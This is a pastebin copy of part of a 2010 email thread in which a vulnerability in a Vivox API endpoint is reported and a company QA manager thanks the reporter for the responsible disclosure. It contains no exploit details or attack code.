  608. date Fri, Jul 2, 2010 at 11:40 PM
  609. subject Fwd: Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  610. mailed-by gmail.com
  611. hide details Jul 2
  612. -----BEGIN PGP SIGNED MESSAGE-----
  613. Hash: SHA1
  614.  
  615. There you go.
  616.  
  617. They work fast.
  618.  
  619. - -------- Original Message --------
  620. Subject: Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  621. Date: Fri, 2 Jul 2010 23:39:49 -0400 (EDT)
  622. From: Ken Cox <[email protected]>
  623. To: Zidonuke <[email protected]>
  624.  
  625. - Show quoted text -
  626. -----BEGIN PGP SIGNATURE-----
  627. Version: GnuPG v1.4.10 (MingW32)
  628. Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
  629.  
  630. iQEcBAEBAgAGBQJMLrE0AAoJEG12Dp/mJePAUSIH+wShnFkBaMDACkk4eGXUtckV
  631. A/IX06Tl0FaaYD7XSAyUpSa6Z+zTTnhKQVlJG0NxZuqU9Vsi5z7pLSszuEg9u9vp
  632. Z5/k7Ux8uDJekTNaz0WgG7twk7Ns2CfyJi/UcgK2ssunHfuq9e/179dDm8JlzUsQ
  633. BvojbRMmZIpd2zsfzzktOuqcCnDYsqJyMaL7RKWvNeU8n4xVVVgU/ddTWOo9Hbhg
  634. eu92G69iGtWX3bS4j7Hl8TPMZn6I0dIelejZKsBE9IpI7v6u9BBjQWmhPaIFu3i3
  635. 6bCJs3i5x35j76Tr3LuuufqaNSlM2LbHuFW6kvFDVt2Hkn8kzKAcmXsRS+kTP80=
  636. =JZmz
  637. -----END PGP SIGNATURE-----
  638. Reply
  639. Forward
  640. Reply
  641. from Jenny Jones <[email protected]>
  642. to Zidonuke <[email protected]>
  643. date Tue, Jul 6, 2010 at 11:06 AM
  644. subject Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  645. mailed-by vivox.com
  646. hide details Jul 6
  647. Thank you!
  648.  
  649. Excellent find by you. *Deeply* appreciate the use of the white hat for this hack, Z.
  650. One of our engineering staff should be contacting you.
  651.  
  652. Again, thank you!
  653. -----------
  654. Jenny Jones
  655. Software QA Manager
  656. Vivox, Inc.
  657. [email protected]
  658. 508-650-3571 x2424
  659. ------------------------------------------------------------------
  660. The contents of this e-mail message and any attachments are Vivox proprietary, confidential, intended solely for the addressee and shared under terms of non disclosure as may exist between Vivox and recipient(s). The information may also be Vivox legally privileged. This transmission is sent for the sole purpose of delivery to the intended recipient. If you have received this transmission in error, any use, reproduction or dissemination of this transmission is strictly prohibited. If you are not the intended recipient, please immediately notify the sender by reply e-mail or phone and delete this message and its attachments, if any.
  661. ------------------------------------------------------------------
  662.  
  663.  
  664.  
  665. ----- Original Message -----
  666. From: "Zidonuke" <[email protected]>
  667. - Show quoted text -
  668. Reply
  669. Forward
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!